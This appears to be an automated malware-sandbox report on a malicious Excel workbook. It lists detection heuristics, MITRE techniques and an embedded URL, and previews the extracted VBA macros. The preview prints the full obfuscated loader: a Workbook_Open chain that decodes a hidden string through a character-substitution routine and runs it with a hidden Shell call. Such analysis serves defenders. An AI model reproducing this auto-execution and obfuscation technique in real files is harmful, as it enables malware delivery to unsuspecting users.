MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The critical heuristics OLE_VBA_SHELL and OLE_VBA_PCODE_AUTOEXEC_EXEC indicate that the Workbook_Open macro executes a Shell() command. This is a common technique for downloading and executing a second-stage payload. The ClamAV detection of Xls.Malware.Valyria-6923228-0 further supports the malicious nature of the file. The embedded URL http://www.day.com/dam/1.0 is likely part of the payload delivery chain.
Heuristics 6
-
ClamAV: Xls.Malware.Valyria-6923228-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-6923228-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.day.com/dam/1.0 In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8579 bytes |
SHA-256: 272adb0f8f85f2d922ced422e47f90f48b7dad7f35b10c5cec85a42d05de0500 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
pr = "st"
print_stacktrace pr, 1
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SIGUSR2"
Attribute VB_Base = "0{66DAD173-49D2-45A5-92E9-0668D9ED2598}{921BD815-969D-4656-8674-DBC0455E4CF1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub Execute_Change()
IMAGE_FILE_MACHINE_AMD64 = SIGUSR2.Execute
dwVar = 100
dwVar = 99
dwVar = 98
dwVar = 97
dwVar = 96
dwVar = 95
dwVar = 94
dwVar = 93
dwVar = 92
dwVar = 91
dwVar = 90
dwVar = 89
dwVar = 88
dwVar = 87
dwVar = 86
dwVar = 85
dwVar = 84
dwVar = 83
dwVar = 82
dwVar = 81
dwVar = 80
dwVar = 79
dwVar = 78
dwVar = 0
Shell IMAGE_FILE_MACHINE_AMD64, 0
End Sub
Private Sub realnameString_Change()
C
End Sub
Attribute VB_Name = "That"
Function General(reach)
identical = ""
USE_WINDOWS_SEHnamespace = 1
plus USE_WINDOWS_SEHnamespace, identical, reach
General = identical
End Function
Function plus(ByRef sys, ByRef verbose, out)
wcContainer = Len(out)
If sys <= wcContainer Then
verbose = verbose + allocating(FILE(Right(left(out, sys), 1)), 4)
sys = sys + 1
plus sys, verbose, out
End If
End Function
Function allocating(reinterpret_cast, GNU)
If reinterpret_cast - GNU < 1 Then
allocating = Right(left(SIGUSR2.NDEBUG, Len(SIGUSR2.NDEBUG) + reinterpret_cast - GNU), 1)
Else
allocating = Right(left(SIGUSR2.NDEBUG, reinterpret_cast - GNU), 1)
End If
End Function
Function FILE(description)
ANSI = 1
NetBSD = 1
GetArrayLength ANSI, NetBSD, description
FILE = NetBSD
End Function
Function GetArrayLength(ByRef ANSI, ByRef NetBSD, description)
main = SIGUSR2.NDEBUG
wcContainer = Len(main)
If ANSI < wcContainer Then
If description <> Right(left(main, ANSI), 1) Then
ANSI = ANSI + 1
GetArrayLength ANSI, NetBSD, description
Else
NetBSD = ANSI
End If
End If
End Function
Attribute VB_Name = "user"
Public Sub C()
SIGUSR2.left1 = General(SIGUSR2.drov)
SIGUSR2.Execute = SIGUSR2.left1
End Sub
Attribute VB_Name = "legal"
Public Sub print_stacktrace(thread, dr)
SIGUSR2.realnameString = thread
dr2 = dr
End Sub
' Processing file: /opt/analyzer/scan_staging/50a262cebe5346ebb9259d35c1116796.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes
' _VBA_PROJECT_CUR/VBA/ThisWorkbook - 1296 bytes
' Line #0:
' FuncDefn (Private Sub Workbook_Open())
' Line #1:
' LitStr 0x0002 "st"
' St pr
' Line #2:
' Ld pr
' LitDI2 0x0001
' ArgsCall print_stacktrace 0x0002
' Line #3:
' EndSub
' Line #4:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/SIGUSR2 - 2159 bytes
' Line #0:
' Line #1:
'
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.